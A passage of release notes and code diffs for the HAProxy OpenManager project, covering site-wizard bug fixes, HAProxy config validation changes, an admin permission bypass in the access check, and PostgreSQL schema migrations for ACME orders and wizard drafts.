ciphersuites would actually land on disk. Phase D enriches both
the backend response (additive — all existing keys preserved)
AND the SiteDrafts UI:
* Backend: emits the full operator-settable surface area on
`would_create` (backend cookie/timeouts/options, per-server
timings + SSL+CA-bundle details, frontend maxconn/timeouts/
compression/ACL counts, HTTPS ciphersuites, etc.).
* Frontend: replaces the four flat Descriptions blocks with a
typed renderer that only surfaces NON-DEFAULT values
(`isMeaningful` predicate) so the modal stays scannable. A
dedicated per-server card surfaces every per-server field
the operator customised. HSTS gets its own section when
enabled.
- **Bulgu #5 — Resume hydration regressions.** Two issues:
1. Existing certificate was wiped on resume. Root cause was
the orphan-detect effect running on the SAME render that
the resume effect committed the new cluster_id. existingCerts
was still `[]` (fetch in flight), so `certIds = new Set()`
and the freshly-resumed `ssl.ssl_certificate_id` looked like
an orphan and got cleared. Phase D fix: short-circuit the
orphan-detect when `existingCertsLoading=true` and add the
loading flag to the effect deps so the check re-runs after
the fetch settles. ALSO: pin `prevClusterRef.current` to
`merged.cluster_id` BEFORE `form.setFieldsValue(merged)` so
the cluster-transition cleanup effect does not misread the
hydration as a user-driven cluster switch.
2. The same stuck "Validating against HAProxy…" — resolved by
the Bulgu #3 self-cancel-race fix above.
- **Bulgu #6 — Create as PENDING button removed.** Pre-fix the
wizard had TWO submit buttons. The "Create as PENDING" button
bypassed the standard manual-flow convention (entity Create →
PENDING version → Apply Management review → operator Apply). The
"Create & Apply" button bypassed Apply Management entirely.
Operators were trained to "always Create & Apply", defeating the
change-review benefit of Apply Management. Phase D consolidates:
* Single button: "Create Site" (or "Create & Apply (ACME)" when
sslMode='acme', because ACME forces the immediate apply for
the HTTP-01 challenge).
* `handleSubmit` derives `effectiveApply` from `sslModeAtSubmit
=== 'acme'` — no button-driven branching.
* Non-ACME flow: `apply_immediately=false` → backend returns
`created_pending` → operator is navigated to /apply-management
where they review the bulk version and click Apply (same
Agent-pull cadence as manual entity creation).
* ACME flow: `apply_immediately=true` (M22 model_validator
enforces this) → standard `created_applied` response.
* The `acmeBlocksDraft` derivation that gated the (now-removed)
PENDING button is retired — handleSubmit's `effectiveApply`
replaces the gate.
##### Phase K Phase D — Backward compatibility / rollback
- **Cluster picker change.** Operators who relied on the wizard-
internal cluster Select must switch via the header instead. No
data-layer change. Drafts saved on a different cluster
auto-swap the header on resume.
- **`/api/sites/preview` response shape.** Additive only — every
pre-existing key keeps the same shape; new keys are
`cluster_id`, `domains`, additive fields on `backend` / `servers`
/ `frontend_http` / `frontend_https`. Legacy frontend callers
ignore unknown fields.
- **`/api/sites` request shape.** Unchanged.
- **No DB migrations** are introduced by Phase K Phase D.
##### Phase K Phase D — Follow-up audit findings (Bulgu #7–#8)
A deeper post-implementation audit surfaced two additional
race conditions that were not visible in the first pass. Both
are now resolved on the same `pilot` branch:
- **Bulgu #7 — Resume cluster swap race on cold mount.** On a
browser refresh of `/sites/new` while a Resume click had
already pre-populated sessionStorage, the wizard mount races
against `ClusterContext`'s `fetchClusters()`. The resume
effect ran with `clustersFromContext=[]`, so
`selectCluster(draftCluster)` was silently skipped. Then
`ClusterContext` finished loading and `selectedCluster`
became the user's `defaultCluster` (NOT the draft's
cluster). The naive header sync then overwrote
`form.cluster_id` with the default cluster, and the
cluster-transition cleanup effect read that overwrite as a
user-driven switch and wiped the draft's cert selections —
the Bulgu #5 second-order failure that survived the
short-circuit fix on a cold mount path.
Fix: header sync effect grew a one-shot post-resume swap
branch keyed on `resumedFromDraft && !resumeClusterSynced`.
When the draft's `cluster_id` is in the freshly-loaded
`clustersFromContext`, the swap pushes the HEADER to the
draft cluster instead of forcing the form to follow the
header. The `resumeClusterSynced` state gates this to
exactly ONE attempt so a later operator-driven header
cluster change is honoured normally. `selectClusterRef`
(a `useRef(selectCluster)` updated by a tiny sync effect)
keeps the dep set small so the header sync effect does not
re-run on every `ClusterProvider` render.
Pin: `tests/test_frontend_auth_bootstrap_phase_j.py::
test_phase_k_phase_d_resume_cluster_swap_race_fix`.
- **Bulgu #8 — Mid-wizard cluster change leaves stale dry-run.**
When an operator on Step 4 changes the header cluster, the
wizard's cluster_id transitions through `form.setFieldsValue`
(the header sync effect's standard force path). Antd's
`setFieldsValue` is a SILENT update that does NOT fire
`onValuesChange`, so the dry-run invalidation tied to
`onValuesChange` never ran. Result: the Step 4 validation
card kept displaying the PREVIOUS cluster's "clean" verdict
even though the wizard payload now targeted a different
cluster.
Fix: the cluster-transition cleanup effect (which already
detected the change to wipe stale cert ids) now also resets
`dryRunResult` to idle and bumps `dryRunInvalidationTick`
whenever `dryRunStatusRef.current !== 'idle'`. The dry-run
effect's dep list picks up the tick bump and re-fires
against the new cluster as soon as the operator reaches
Step 4.
Pin: `tests/test_frontend_auth_bootstrap_phase_j.py::
test_phase_k_phase_d_cluster_change_invalidates_dry_run`.
Both fixes are additive (no API or DB changes) and rollback
without leaving residual state — disabling the new effects
simply restores the previous (racy) behaviour.
##### Phase K Phase D — Operator-feedback round 2 (Bulgu #9–#11)
A second operator-feedback round surfaced one parity gap and two
follow-ups on the wizard's HAProxy validation experience:
- **Bulgu #9 — Wizard PEM upload parity with SSL Management page.**
Pre-fix `services.ssl_service.create_cert_row` (the helper the
wizard calls when `ssl.mode='upload'`) was a thin INSERT that
never parsed the PEM. It stored `primary_domain` / `all_domains`
from the operator-entered FRONTEND domains (not the cert SAN),
left `expiry_date` / `issuer` / `fingerprint` NULL, hard-coded
`status='valid'` and `days_until_expiry=0`, never validated the
private key or chain, never checked name uniqueness (so a
duplicate name would 500 at the DB unique constraint), and could
not reactivate a soft-deleted row of the same name. The
resulting cert showed up on the SSL Management page with empty
expiry/issuer columns and a permanent "valid" status — confusing
UX and clearly inconsistent with the dedicated SSL Management
upload flow (`POST /api/ssl/certificates`).
Fix: `create_cert_row` now mirrors `routers/ssl.py::
create_ssl_certificate`:
- parses the PEM via `utils.ssl_parser.parse_ssl_certificate`
(raises HTTPException 400 on parse failure),
- validates private_key + chain via `validate_private_key`
/ `validate_certificate_chain`,
- computes status / days_until_expiry from the normalised
timezone-naive UTC `expiry_date`,
- enforces name uniqueness within the target cluster (returns
400 instead of a DB-level 500),
- reactivates soft-deleted rows of the same name (preserves
the row id for downstream references).
Pin: `tests/test_ssl_service_extraction.py` — 11 tests cover
the happy path, all 6 negative paths (parse fail, empty content,
bad private key, bad chain, duplicate active name, soft-delete
reactivation), and the "metadata comes from PEM, not payload"
contract.
- **Bulgu #10 — Heuristic validator rejected wizard's own default
timeouts.** The wizard's config synthesis emits `timeout connect
10000ms` / `timeout server 60000ms` / `timeout client 100ms`
(millisecond suffix is canonical HAProxy syntax). The pre-fix
heuristic regex was `^\d+[smhd]?$`, which only allowed the
single-character suffixes `s`/`m`/`h`/`d` — `ms` was rejected
outright even though the same validator's own suggestion text
said "Use format like '5s', '30000ms', '1m'". Operators saw
10+ FALSE-POSITIVE "Invalid timeout value '10000ms'" errors on
the wizard's defaults at Step 4 and could not click Create.
Fix: `utils/haproxy_validator.py::_validate_timeout_directive`
regex relaxed to `^\d+(us|ms|s|m|h|d)?$` — accepting the full
set of HAProxy time-format suffixes (per the HAProxy docs Time
format chapter) while still rejecting malformed values like
`10000xx`, `abc`, `-100ms`, `1.5s`, and bare `ms`.
Pin: `tests/test_haproxy_validator_timeout_units.py` — 17
parametrised cases (11 valid formats, 5 invalid formats, plus
the exact operator-reported failure mode).
- **Bulgu #11 — Operator reported "Previous loses values".**
Architectural review confirmed the wizard's contract is sound:
every step is rendered into a long-lived `<div>` whose only
step-driven prop is the CSS `display` toggle (`block` vs
`none`). React does NOT unmount the children, Antd's Form.Item
registrations stay intact, and the Antd default `preserve=true`
keeps values in form state even for the inner Form.Items that
conditional-render inside `<Form.Item shouldUpdate>` (SSL mode
branches, TCP/http frontend mode toggle). All wizard
`setFieldsValue` call-sites are guarded by domain triggers
(cluster change, sslMode change, TCP-mode-clears-https_redirect,
resume hydration) — none fire on a Previous/Next click alone.
No code regression was identified. Most likely operator
perception driver: with Bulgu #10 fixed, the `timeout
connect=10000` / `timeout server=60000` values the operator
saw in the "Advanced backend settings" Collapse after coming
back from Step 4 are simply the wizard's pre-existing defaults
(`backend.timeout_connect=10000`, `backend.timeout_server=
60000`, `backend.timeout_queue=60000`), not regressed values
— these were never operator-entered, just defaults the
operator did not notice in the collapsed Advanced section on
the forward pass.
Defensive measure: a static-source pin test asserts the
architectural contract so a future refactor cannot regress
to per-step conditional rendering or sneak a
`preserve={false}` in:
`tests/test_frontend_auth_bootstrap_phase_j.py::
test_phase_k_phase_d_wizard_preserves_form_state_across_step_navigation`.
If the operator can reproduce specific field-level state loss
on a Previous click after the Bulgu #10 fix, please file the
repro steps so we can target the actual scenario.
##### Rollback considerations (Phase I)
If you must roll back to a pre-rebrand v1.5.x build after operators have already saved drafts on the new build:
- New rows on `wizard_drafts` with `wizard_type='site'` will be invisible to the legacy code path that filters on `wizard_type='proxied_host'` only. Operators will see those new drafts disappear from the listing AND will not be counted against the 50-draft cap. The rows themselves are not deleted — they expire via the standard 30-day TTL prune.
- Pre-rebrand rows with `wizard_type='proxied_host'` continue to work on the legacy build because their value never changed.
- The schema-level `DEFAULT` is not rolled back automatically. Operators rolling back can either (a) leave it at `'site'` (harmless — the legacy build hard-codes `'proxied_host'` in every INSERT, so the default is never consulted) or (b) re-run an `ALTER TABLE wizard_drafts ALTER COLUMN wizard_type SET DEFAULT 'proxied_host'` to restore the original schema.
##### Phase K Phase D — Operator-feedback round 3 (Bulgu #12)
**Operator-reported failure flow** (May 11, 2026):
The wizard's Step 4 dry-run showed 8 WARNINGs but no ERRORs, so Create proceeded; the operator then applied via Apply Management and the real `haproxy -c` parse rejected the config:
```
[ALERT] parsing [/tmp/haproxy-new-config.cfg:79] : error detected while parsing ACL 'acl1' : failed to open pattern file </path>.
[ALERT] parsing [/tmp/haproxy-new-config.cfg:87] : error detected while parsing switching rule : no such ACL : 'acl1'.
[ALERT] Fatal errors found in configuration.
```
The 8 WARNINGs were ALSO operator-confusing false positives:
```
[frontend] Directive 'stick-table' may not be valid in 'frontend' section
[frontend] Directive 'tcp-request' may not be valid in 'frontend' section (×2)
[backend] Directive 'cookie' may not be valid in 'backend' section (×2)
[backend] Missing 'global' section - recommended for production
```
**Two root causes:**
1. **Heuristic validator `valid_directives` was incomplete** — `stick-table`, `tcp-request`, `tcp-response`, `cookie`, `http-after-response`, `errorfile`, `description`, `id`, `filter`, etc. are perfectly valid in their respective sections but the validator's small hand-picked sets did not list them. Every wizard / manual page that emitted them flagged a spurious "may not be valid" WARNING. The wizard's pre-persist apply-time gate uses the same validator; even though it only blocks on ERROR-level findings, the noise polluted the operator-visible response trail and the version-history page.
2. **ACL `-f <file>` pattern-file references** — the visual ACL builder offered `-f (from file)` as a selectable flag, and neither the manual Frontend API's Pydantic validator (`models/frontend.py::validate_acl_rules`) nor the wizard's Pydantic validator (`models/site_wizard.py::_validate_haproxy_directive_string`) rejected `-f`. HAProxy OpenManager is a fully-managed product: it does NOT provision pattern files onto the HAProxy node's filesystem, so any operator-typed `-f /path/...` ALWAYS resolves to "file not found" at HAProxy reload time. The UI made it trivial to author an unsupported state.
**Three-layer fix:**
**Layer A — Heuristic validator** (`backend/utils/haproxy_validator.py`):
- Expanded `valid_directives['frontend']` to include `stick-table`, `stick`, `tcp-request`, `tcp-response`, `http-after-response`, `errorfile`, `errorloc`, `errorloc302`, `errorloc303`, `http-error`, `description`, `id`, `filter`, `monitor`, `unique-id-format`, `unique-id-header`, `declare`, `http-buffer-request`, plus a long-tail of less-common-but-valid directives.
- Expanded `valid_directives['backend']` to include `cookie`, `appsession`, `tcp-request`, `tcp-response`, `tcp-check`, `retries`, `fullconn`, `dispatch`, `redirect`, `use-server`, `acl`, `capture`, `errorfile`, `description`, `id`, `filter`, `rate-limit`, `email-alert`, `force-persist`, `transparent`, `source`, plus a long-tail.
- Added `partial_fragment: bool = False` parameter to `HAProxyConfigValidator.validate_config()` and the module-level `validate_haproxy_config()`. When True (or auto-detected via the wizard's marker comment), the validator suppresses the "Missing 'global' section" / "Consider adding 'defaults' section" diagnostics — the wizard / cluster synthesis intentionally OMITS those blocks because the agent merges them with its local copy on disk.
- Both the wizard's `/preview` dry-run AND the apply-time pre-persist gate now pass `partial_fragment=True` (`backend/routers/site_wizard.py`).
**Layer B — ACL `-f` rejection in Pydantic** (server-side gate):
- `backend/models/site_wizard.py`: Added `_ACL_FILE_FLAG_PATTERN = re.compile(r"(^|\s)-f(\s|$)")` and rejected the pattern inside `_validate_haproxy_directive_string` with an operator-friendly message explaining why the product cannot support pattern files. This covers `acl_rules`, `use_backend_rules`, and string-shaped `redirect_rules`.
- `backend/models/frontend.py::validate_acl_rules`: Mirrored the same rejection on the manual Frontend API so both create paths return the identical 400/422 envelope.
**Layer C — ACL `-f` removal from the visual builder + UI gates** (client-side authoring guardrail):
- `frontend/src/components/ACLRuleBuilder.js`: Removed `-f` from the selectable `FLAGS` list. Updated `FLAG_HINTS` to drop the `-f` mention. Existing rules that already carry `-f` (loaded from saved drafts pre-fix) keep the tag visible as `-f (deprecated — remove)` so operators can SEE and REMOVE the flag, but cannot re-add it once removed. Added a section-level red `Alert` that counts every rule carrying `-f` and explains the failure mode + remediation. Inline rule-card error decoration (`status='error'` + red border + inline description) surfaces the same message at the per-rule level. Mirrored the regex client-side so raw-mode typed `-f` immediately flags inline.
- `frontend/src/components/SiteWizard.js`: Added a Step 2 → Step 3 hard-gate on the Next button — if ANY rule still carries `-f`, the click surfaces the same operator-friendly error and refuses to advance.
- `frontend/src/components/FrontendManagement.js::handleSubmit`: Mirrored the same gate so the manual Frontend page rejects submit identically.
**Backward compatibility:**
- Existing drafts that contain `-f`-flagged rules still load — the ACLRuleBuilder displays them visibly so operators can remove them. Submit is blocked until they do.
- Existing PERSISTED frontend rows in the DB that already carry `-f` (created before this fix) continue to work at the agent level — the validator changes do NOT retroactively reject them. They can still be EDITED through the UI (which will block save until `-f` is removed) or read via the API for visibility / audit.
- The expanded `valid_directives` sets only ADD entries; nothing previously accepted is now flagged. Pre-existing tests that asserted "Directive X is valid" continue to pass.
**Tests added:**
- `backend/tests/test_haproxy_validator_bulgu12.py` (27 new tests):
- Per-directive false-positive regression pins for both frontend and backend sections.
- `partial_fragment=True` suppression + marker-comment auto-detect.
- Wizard Pydantic `-f` rejection across spacing/position variants.
- Anchor-correctness pin: regex must NOT match `-foo` / `-file` substrings inside other tokens.
- Manual Frontend API parity pin.
- End-to-end pin replaying the user's actual config (minus `-f`) with zero spurious WARNINGs.
- `backend/tests/test_site_wizard_phase2_validator_gate.py`: Widened the pre-window lookback from 400 to 1500 chars to accommodate the partial-fragment forwarding comment block.
**Rollback considerations:**
- Reverting the `valid_directives` expansion brings back operator-visible WARNING noise but does NOT break apply (which only gates on ERROR). Safe to roll back if a regression is discovered.
- Reverting the `-f` Pydantic rejection ALLOWS operators to author the failure mode again, but does not break anything that worked before. Roll back ONLY if a customer has pre-provisioned pattern files and a tightly-controlled need to reference them.
- Reverting the ACLRuleBuilder UI changes is a pure visual revert; the Pydantic gate keeps the safety net.
### Earlier Releases
For earlier release notes (v1.4.0 ACME stability + enterprise audit, v1.3.0, ...) see the [GitHub Releases](https://github.com/taylanbakircioglu/haproxy-openmanager/releases) page.
---
**Made with ❤️ for the HAProxy community**
+51 -2
View File
@@ -227,11 +227,60 @@ async def get_user_permissions(user_id: int) -> Dict[str, Dict[str, bool]]:
logger.error(f"Error getting user permissions for user {user_id}: {e}")
return {}
async def check_user_permission(user_id: int, resource: str, action: str) -> bool:
async def check_user_permission(
user_id: int,
resource: str,
action: str,
*,
current_user: Optional[Dict[str, Any]] = None,
) -> bool:
"""
Check if user has specific permission
Check if user has specific permission.
R18c round 7 (Bulgu 1): system-wide admin bypass. A user with
``users.is_admin = TRUE`` is the canonical super-admin and MUST pass
every granular permission check, regardless of the role they're
attached to. Otherwise enterprise admins were getting 403s on
composite endpoints (e.g. wizard CREATE) when their role's
``permissions`` JSONB didn't enumerate every individual action
(backend.create, frontend.create, ssl.create, apply.execute).
Two short-circuit paths:
1. Caller already has ``current_user`` resolved (typical FastAPI
endpoint) — pass it via the kwarg-only ``current_user`` to skip
the DB roundtrip entirely.
2. Caller doesn't have it — we run a single
``SELECT is_admin FROM users WHERE id=$1 AND is_active=TRUE``
before falling back to the role-based permission lookup.
Backward-compat: positional 3-arg signature preserved.
"""
try:
# Path 1: caller-provided current_user dict
if current_user is not None and current_user.get("is_admin") is True:
logger.debug(
"Admin bypass for %s.%s (user_id=%s, via current_user)",
resource, action, user_id,
)
return True
# Path 2: cheap is_admin lookup before role-permissions join
conn = await get_database_connection()
try:
row = await conn.fetchrow(
"SELECT is_admin FROM users WHERE id = $1 AND is_active = TRUE",
int(user_id),
)
finally:
await close_database_connection(conn)
if row and row.get("is_admin") is True:
logger.debug(
"Admin bypass for %s.%s (user_id=%s, via DB lookup)",
resource, action, user_id,
)
return True
permissions = await get_user_permissions(user_id)
return permissions.get(resource, {}).get(action, False)
except Exception as e:
+436 -3
View File
@@ -116,7 +116,22 @@ async def ensure_agents_table():
# Ensure frontend columns exist (for comprehensive frontend config support)
frontend_columns = {
'ssl_cert': "ALTER TABLE frontends ADD COLUMN ssl_cert TEXT;",
'ssl_verify': "ALTER TABLE frontends ADD COLUMN ssl_verify VARCHAR(50) DEFAULT 'optional';",
# PR-2 (R11.B): default flipped from 'optional' to NULL.
# Pre-PR-2 every newly INSERTED frontend row carried
# ``ssl_verify='optional'``, which the HAProxy config
# generator then rendered as ``bind ... ssl ... verify
# optional`` — but without a client-CA bundle (no
# ``ssl_client_ca_certificate_id`` column exists yet),
# HAProxy emitted the fatal ALERT
# ``verify is enabled but no CA file specified``. The
# explicit data cleanup migration further down (`pr2_…`)
# also flips existing ``DEFAULT 'optional'`` definitions
# on already-deployed databases via
# ``ALTER COLUMN ... DROP DEFAULT``. The Python-side
# safeguard in services/haproxy_config.py
# (``_apply_bind_ssl_verify``) is the runtime backstop;
# this is the data-side fix.
'ssl_verify': "ALTER TABLE frontends ADD COLUMN ssl_verify VARCHAR(50);",
'timeout_client': "ALTER TABLE frontends ADD COLUMN timeout_client INTEGER;",
'timeout_http_request': "ALTER TABLE frontends ADD COLUMN timeout_http_request INTEGER;",
'rate_limit': "ALTER TABLE frontends ADD COLUMN rate_limit INTEGER;",
@@ -139,6 +154,74 @@ async def ensure_agents_table():
await conn.execute(query)
logger.info(f"Successfully added column '{col}' to 'frontends'.")
# ─────────────────────────────────────────────────────────────────
# PR-2 R11.B: ssl_verify default flip + invalid value cleanup.
# Already-deployed databases (created before PR-2) still have the
# column DEFAULT set to 'optional'. Drop the default in-place so
# all subsequent INSERTs leave the column NULL when no value is
# supplied. Existing rows are NOT mass-rewritten — operators may
# have legitimately enabled mTLS, and the runtime safeguard in
# services/haproxy_config.py handles them. We only clean up rows
# where the value is OUTSIDE the canonical Literal set, which is
# always-incorrect data (legacy 'true'/'false'/'1' artefacts that
# the unified Pydantic Literal would now reject).
# ─────────────────────────────────────────────────────────────────
try:
ssl_verify_default = await conn.fetchval("""
SELECT column_default
FROM information_schema.columns
WHERE table_name='frontends' AND column_name='ssl_verify'
""")
if ssl_verify_default and "'optional'" in str(ssl_verify_default):
logger.info(
"PR-2 R11.B: dropping legacy DEFAULT 'optional' from "
"frontends.ssl_verify (new INSERTs will leave the "
"column NULL → no `verify` directive emitted by the "
"HAProxy config generator until a client-CA bundle "
"is configured)."
)
await conn.execute(
"ALTER TABLE frontends ALTER COLUMN ssl_verify DROP DEFAULT;"
)
logger.info("PR-2 R11.B: ssl_verify DEFAULT dropped successfully.")
# Cleanup any rows whose ssl_verify is outside the canonical
# Literal set ({'none','optional','required'}). NULL and
# canonical values are preserved as-is. The cleanup is
# idempotent and bounded — only invalid values get rewritten.
#
# R11-audit-3 (FIX-3): the pre-fix block used `fetchval` with
# a CTE that returned multi-row `RETURNING f.id`, which
# silently kept only the first row's id and logged a
# misleading "cleaned up row id=<single id>" message even
# when N>1 rows were actually rewritten. Switched to
# `execute()` so we can parse the asyncpg status string
# (`'UPDATE N'`) and report the true row count.
cleanup_status = await conn.execute("""
UPDATE frontends
SET ssl_verify = NULL
WHERE ssl_verify IS NOT NULL
AND ssl_verify NOT IN ('none', 'optional', 'required')
""")
cleanup_n = 0
try:
# asyncpg returns a status tag like 'UPDATE 0' / 'UPDATE 7'
cleanup_n = int(str(cleanup_status).split()[-1])
except (ValueError, IndexError, AttributeError):
cleanup_n = 0
if cleanup_n > 0:
logger.info(
f"PR-2 R11.B: cleaned up {cleanup_n} frontends row(s) "
f"with ssl_verify outside the canonical Literal set"
)
except Exception as e:
# Idempotency guard: any failure here is non-fatal (the
# runtime safeguard still prevents the fatal HAProxy ALERT).
logger.warning(
f"PR-2 R11.B ssl_verify cleanup migration encountered "
f"a non-fatal error (continuing): {e}"
)
# Entity config status enum and per-entity status columns
entity_status_enum_exists = await conn.fetchval("""
SELECT 1 FROM pg_type WHERE typname = 'config_entity_status'
@@ -1603,7 +1686,20 @@ async def run_all_migrations():
await ensure_acme_columns_on_existing_tables()
# Issue #11 cleanup: must run AFTER acme_tables/columns to ensure FK refs exist
await cleanup_orphan_acme_challenge_backend()
# v1.5.0 Feature A (ACME diagnostics) + Feature B (site wizard)
# Order matters: letsencrypt_orders column additions BEFORE acme_order_events
# FK setup; both BEFORE wizard_drafts (user FK uses pre-existing users table).
await ensure_letsencrypt_orders_post_completion_actions_column()
await ensure_letsencrypt_orders_wizard_staged_until_column()
await ensure_letsencrypt_orders_pending_apply_version_name_column()
await ensure_letsencrypt_orders_created_by_column()
await ensure_acme_order_events_table()
await ensure_wizard_drafts_table()
await ensure_user_activity_logs_user_action_time_index()
# R18c round 3 #1 (KRITIK concurrency): partial unique on
# (cluster_id, bind_address, bind_port) WHERE is_active.
await ensure_frontends_bind_unique_constraint()
logger.info("Database migrations completed successfully.")
async def add_ssl_certificate_id_to_backend_servers():
@@ -2129,7 +2225,7 @@ async def create_essential_tables(conn):
ssl_port INTEGER,
ssl_cert_path VARCHAR(255),
ssl_cert TEXT,
ssl_verify VARCHAR(20) DEFAULT 'optional',
ssl_verify VARCHAR(20), -- PR-2 (R11.B): no DEFAULT; NULL means "omit verify directive"
acl_rules JSONB DEFAULT '[]'::jsonb,
redirect_rules JSONB DEFAULT '[]'::jsonb,
use_backend_rules JSONB DEFAULT '[]'::jsonb,
@@ -3242,3 +3338,340 @@ async def cleanup_orphan_acme_challenge_backend():
if conn:
await close_database_connection(conn)
logger.error(f"Error in cleanup_orphan_acme_challenge_backend: {e}")
# =============================================================================
# v1.5.0 migrations: ACME diagnostic panel (Feature A) + site wizard (B)
# =============================================================================
async def ensure_letsencrypt_orders_post_completion_actions_column():
"""v1.5.0: add post_completion_actions JSONB column on letsencrypt_orders.
Carries the deferred HTTPS frontend create payload (and any future
post-completion actions) for wizard-staged ACME orders. Idempotent.
"""
conn = None
try:
conn = await get_database_connection()
await conn.execute(
"""
ALTER TABLE letsencrypt_orders
ADD COLUMN IF NOT EXISTS post_completion_actions JSONB DEFAULT '[]'::jsonb
"""
)
logger.info("Ensured letsencrypt_orders.post_completion_actions column")
await close_database_connection(conn)
except Exception as e:
if conn:
await close_database_connection(conn)
logger.error(f"Error in ensure_letsencrypt_orders_post_completion_actions_column: {e}")
async def ensure_letsencrypt_orders_wizard_staged_until_column():
"""v1.5.0: add wizard_staged_until TIMESTAMPTZ column on letsencrypt_orders.
Used by complete_pending_acme_orders to abandon stale wizard_staged orders
after 24h (M25). NULL for non-wizard orders.
"""
conn = None
try:
conn = await get_database_connection()
await conn.execute(
"""
ALTER TABLE letsencrypt_orders
ADD COLUMN IF NOT EXISTS wizard_staged_until TIMESTAMPTZ
"""
)
logger.info("Ensured letsencrypt_orders.wizard_staged_until column")
await close_database_connection(conn)
except Exception as e:
if conn:
await close_database_connection(conn)
logger.error(f"Error in ensure_letsencrypt_orders_wizard_staged_until_column: {e}")
async def ensure_letsencrypt_orders_pending_apply_version_name_column():
"""v1.5.0: add pending_apply_version_name VARCHAR + partial index for fast
`wizard_staged` lookups by config version name.
The wizard records the bulk-site-create-{ts} version name (legacy
naming pre-rename: bulk-proxied-host-create-{ts}) into
this column when it stages the order; the background task uses
string-equality vs agents.applied_config_version to gate LE API calls.
"""
conn = None
try:
conn = await get_database_connection()
await conn.execute(
"""
ALTER TABLE letsencrypt_orders
ADD COLUMN IF NOT EXISTS pending_apply_version_name VARCHAR(255)
"""
)
await conn.execute(
"""
CREATE INDEX IF NOT EXISTS idx_letsencrypt_orders_wizard_staged
ON letsencrypt_orders (pending_apply_version_name)
WHERE status = 'wizard_staged'
"""
)
logger.info(
"Ensured letsencrypt_orders.pending_apply_version_name column + partial index"
)
await close_database_connection(conn)
except Exception as e:
if conn:
await close_database_connection(conn)
logger.error(
f"Error in ensure_letsencrypt_orders_pending_apply_version_name_column: {e}"
)
async def ensure_letsencrypt_orders_created_by_column():
"""v1.5.0: add created_by INTEGER on letsencrypt_orders (R31/M23).
Carries the requesting user_id so post_completion_actions auto-apply
can attribute the apply to the original wizard caller. ON DELETE
SET NULL so deleting the user does not break orphan orders.
"""
conn = None
try:
conn = await get_database_connection()
await conn.execute(
"""
ALTER TABLE letsencrypt_orders
ADD COLUMN IF NOT EXISTS created_by INTEGER
REFERENCES users(id) ON DELETE SET NULL
"""
)
logger.info("Ensured letsencrypt_orders.created_by column (FK ON DELETE SET NULL)")
await close_database_connection(conn)
except Exception as e:
if conn:
await close_database_connection(conn)
logger.error(f"Error in ensure_letsencrypt_orders_created_by_column: {e}")
async def ensure_acme_order_events_table():
"""v1.5.0 Feature A: detailed ACME event log table.
Used by record_event() for diagnostic timeline display. CASCADE on order
delete so deleting a letsencrypt_order also cleans up its event trail.
Daily-watermarked TTL prune (90d) lives in main.py background task.
"""
conn = None
try:
conn = await get_database_connection()
exists = await conn.fetchval(
"""
SELECT EXISTS (
SELECT 1 FROM information_schema.tables
WHERE table_name = 'acme_order_events'
)
"""
)
if not exists:
await conn.execute(
"""
CREATE TABLE acme_order_events (
id BIGSERIAL PRIMARY KEY,
order_id INTEGER NOT NULL
REFERENCES letsencrypt_orders(id) ON DELETE CASCADE,
event_type VARCHAR(64) NOT NULL,
severity VARCHAR(16) NOT NULL DEFAULT 'INFO',
message TEXT,
details JSONB DEFAULT '{}'::jsonb,
correlation_id VARCHAR(64),
created_at TIMESTAMPTZ NOT NULL DEFAULT NOW()
)
"""
)
logger.info("Created acme_order_events table")
# R16 hardening (#R16-2): indexes must run UNCONDITIONALLY on every
# startup, not just on first table creation. An older deploy that
# raced ahead of these indexes (or where the table was created by a
# previous v1.5.0 push before the daily-watermarked retention task
# existed) would otherwise be stuck doing sequential scans for the
# 90-day prune query. Both `CREATE INDEX IF NOT EXISTS` calls are
# idempotent so re-running is safe.
await conn.execute(
"CREATE INDEX IF NOT EXISTS idx_acme_order_events_order_id "
"ON acme_order_events(order_id, created_at DESC)"
)
await conn.execute(
"CREATE INDEX IF NOT EXISTS idx_acme_order_events_created_at "
"ON acme_order_events(created_at)"
)
await close_database_connection(conn)
except Exception as e:
if conn:
await close_database_connection(conn)
logger.error(f"Error in ensure_acme_order_events_table: {e}")
async def ensure_wizard_drafts_table():
"""v1.5.0 Feature B: persisted wizard drafts.
expires_at defaults to NOW() + 30d; daily-watermarked prune in main.py.
user_id ON DELETE CASCADE so deleting a user removes their drafts.
"""
conn = None
try:
conn = await get_database_connection()
exists = await conn.fetchval(
"""
SELECT EXISTS (
SELECT 1 FROM information_schema.tables
WHERE table_name = 'wizard_drafts'
)
"""
)
if not exists:
await conn.execute(
"""
CREATE TABLE wizard_drafts (
id SERIAL PRIMARY KEY,
user_id INTEGER NOT NULL
REFERENCES users(id) ON DELETE CASCADE,
wizard_type VARCHAR(64) NOT NULL DEFAULT 'site',
title VARCHAR(255),
payload JSONB NOT NULL DEFAULT '{}'::jsonb,
expires_at TIMESTAMPTZ NOT NULL DEFAULT (NOW() + INTERVAL '30 days'),
created_at TIMESTAMPTZ NOT NULL DEFAULT NOW(),
updated_at TIMESTAMPTZ NOT NULL DEFAULT NOW()
)
"""
)
logger.info("Created wizard_drafts table")
# R16 hardening (#R16-2): see acme_order_events fix above. Indexes
# MUST run unconditionally so existing v1.5.0 first-deploy tables
# also get the prune-supporting expires_at index.
await conn.execute(
"CREATE INDEX IF NOT EXISTS idx_wizard_drafts_user_type "
"ON wizard_drafts(user_id, wizard_type, updated_at DESC)"
)
await conn.execute(
"CREATE INDEX IF NOT EXISTS idx_wizard_drafts_expires_at "
"ON wizard_drafts(expires_at)"
)
# Phase I: Site rebrand — flip the schema-level DEFAULT for the
# `wizard_type` column from the legacy 'proxied_host' value to
# the post-rebrand 'site' value so all NEW rows (when callers
# rely on the column default) land with the canonical naming.
# This is purely an `ALTER TABLE … ALTER COLUMN … SET DEFAULT`
# — idempotent, takes a SHARE UPDATE EXCLUSIVE-equivalent
# metadata lock that does NOT block readers/writers, and does
# not rewrite existing rows. Pre-rename rows still carry
# `wizard_type='proxied_host'`; the application code path
# accepts BOTH values via dual-filter (`IN ('site',
# 'proxied_host')`) on every read/delete query, so older
# drafts remain visible to their owner and remain rejectable
# via the cluster cleanup.
await conn.execute(
"ALTER TABLE wizard_drafts ALTER COLUMN wizard_type SET DEFAULT 'site'"
)
await close_database_connection(conn)
except Exception as e:
if conn:
await close_database_connection(conn)
logger.error(f"Error in ensure_wizard_drafts_table: {e}")
async def ensure_user_activity_logs_user_action_time_index():
"""v1.5.0 (M33/R50): composite index on user_activity_logs for the new
per-user-per-minute rate-limit COUNT(*) query used by ACME diagnostics
and wizard preflight rate-limits.
"""
conn = None
try:
conn = await get_database_connection()
await conn.execute(
